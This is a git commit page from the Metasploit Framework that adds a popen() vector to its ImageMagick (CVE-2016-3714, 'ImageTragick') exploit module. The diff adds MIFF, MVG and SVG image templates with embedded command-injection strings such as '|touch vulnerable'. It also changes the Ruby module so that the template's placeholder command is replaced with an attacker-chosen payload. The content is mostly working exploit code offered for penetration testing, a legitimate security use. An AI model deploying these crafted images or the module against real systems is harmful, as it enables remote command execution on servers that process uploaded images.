Land #6922, add popen() additional vector to ImageMagick exploit (imagemagick_delegate)
commit
5420848c49
Before Width: | Height: | Size: 593 B After Width: | Height: | Size: 593 B |
|
@ -0,0 +1,14 @@
|
|||
id=ImageMagick version=1.0
|
||||
class=DirectClass colors=0 matte=False
|
||||
columns=1 rows=1 depth=16
|
||||
colorspace=sRGB
|
||||
page=1x1+0+0
|
||||
rendering-intent=Perceptual
|
||||
gamma=0.454545
|
||||
red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06
|
||||
white-point=0.3127,0.329
|
||||
date:create=2016-05-04T00:19:42-05:00
|
||||
date:modify=2016-05-04T00:19:42-05:00
|
||||
label={";touch vulnerable"}
|
||||
|
||||
:ÿÿÿÿÿÿ
|
|
@ -0,0 +1,8 @@
|
|||
push graphic-context
|
||||
encoding "UTF-8"
|
||||
viewbox 0 0 1 1
|
||||
affine 1 0 0 1 0 0
|
||||
push graphic-context
|
||||
image Over 0,0 1,1 '|touch vulnerable'
|
||||
pop graphic-context
|
||||
pop graphic-context
|
|
@ -0,0 +1,5 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
|
||||
xlink:href="|touch vulnerable" />
|
||||
</svg>
|
After Width: | Height: | Size: 480 B |
|
@ -23,6 +23,9 @@ class MetasploitModule < Msf::Exploit
|
|||
|
||||
Tested on Linux, BSD, and OS X. You'll want to choose your payload
|
||||
carefully due to portability concerns. Use cmd/unix/generic if need be.
|
||||
|
||||
If ImageMagick supports popen(), a |-prefixed command will be used for
|
||||
the exploit. No delegates are involved in this exploitation.
|
||||
},
|
||||
'Author' => [
|
||||
'stewie', # Vulnerability discovery
|
||||
|
@ -35,7 +38,8 @@ class MetasploitModule < Msf::Exploit
|
|||
%w{URL https://imagetragick.com/},
|
||||
%w{URL http://seclists.org/oss-sec/2016/q2/205},
|
||||
%w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
|
||||
%w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
|
||||
%w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},
|
||||
%w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}
|
||||
],
|
||||
'DisclosureDate' => 'May 3 2016',
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -64,7 +68,8 @@ class MetasploitModule < Msf::Exploit
|
|||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
|
||||
OptString.new('FILENAME', [true, 'Output file', 'msf.png']),
|
||||
OptBool.new('HAVE_POPEN', [false, 'popen() support', true])
|
||||
])
|
||||
end
|
||||
|
||||
|
@ -75,12 +80,18 @@ class MetasploitModule < Msf::Exploit
|
|||
p = payload.encoded
|
||||
end
|
||||
|
||||
if datastore['HAVE_POPEN']
|
||||
file_create(template.sub('touch vulnerable', p))
|
||||
else
|
||||
file_create(template.sub('echo vulnerable', p))
|
||||
end
|
||||
end
|
||||
|
||||
def template
|
||||
File.read(File.join(
|
||||
Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
|
||||
Msf::Config.data_directory, 'exploits', 'imagemagick',
|
||||
datastore['HAVE_POPEN'] ? 'popen' : 'delegate',
|
||||
target[:template]
|
||||
))
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue